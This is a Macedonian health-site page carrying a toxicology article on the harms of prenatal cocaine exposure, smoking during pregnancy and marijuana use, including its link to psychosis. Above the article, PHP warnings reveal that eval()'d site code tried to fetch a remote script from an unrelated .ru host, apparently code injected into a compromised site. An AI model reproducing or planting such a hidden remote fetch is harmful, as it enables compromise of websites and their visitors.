Нови сознанија за штетното дејство на дрогите | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
                         
                           
                             

ТОКСИКОЛОГИЈА

                           
                           
                           
                       

Нови сознанија за штетното дејство на дрогите

Автор:

Научен сор.

Д-р. сци Нико Беќаровски

Специјалист по Интерна медицина – клинички токсиколог

Клиника за токсикологија





Кокаинот и пушењето во текот на бременоста трајно ги намалуваат вербалните способности кај децата






Според наодите на една нова студија спроведена на Универзитетот во Кливленд, САД, децата чии мајки во текот на бременоста конзумирале кокаин, подоцна покажуваат потпросечни вербални способности во однос на своите врсници.



Студијата била спроведена на 400 деца кои биле следени од раѓањето до шестата година од животот и докажала дека овие деца имаат трајно помали вербални способности, односно помал фонд на зборови и потешко разбирање на стандардниот говор. На оваа појава, условите во кои што живееле децата, немале влијание.

Исто така, децата чии што мајки пушеле во текот на бременоста имале дури и полоши резултати од децата чии што мајки конзумирале кокаин.



Марихуаната доведува до душевни заболувања



Според еден од последните извештаи на Уредот за национална политика за контрола на дроги на Белата куќа, опасната комбинација на депресија, адолесценција и пушење марихуана може да доведе до зависност, ментални заболувања и самоубиствени мисли. Според ова известување, тинејџерите кои што се депресивни имаат два пати поголеми изгледи да пробаат марихуана за разлика од недепресивните, односно ризикот е 25% кај првите и 12% кај вторите.



Според ова известување, конзумирањето на марихуана го зголемува ризикот за ментални заболувања за цели 40%. Младите кои пушат марихуана барем еднаш месечно во текот на една година, три пати почесто помислуваат на самоубиство.



Марихуаната доведува до психоза



Резултатите на најновата британска студија докажаа дека конзумирањето на марихуана значително го зголемува ризикот од развој на психоза, како шизофренија. Марихуаната во голем број на земји е најраспространета дрога и долго време се сметаше дека не е толку опасна. Според релевантни извори, секој петти млад Британец повремено конзумира марихуана, додека секој 15-ти тоа го прави многу често.



Групата научници од Универзитетите Бристол и Кардиф утврдија дека уживателите на оваа дрога се изложени на 41% поголем ризик во подоцнежните години да развијат некои од психозите пропратени со халуцинации и измами во однос на тие кои никогаш не конзумирале. Со секоја нова испушена цигара марихуана, тој ризик расте. Поранешните слични студии веќе утврдија дека конзумирањето на марихуаната доведува до симптоми слични на шизофренија и параноја.

ЗА ЗДРАВЈЕ NEWSLETTER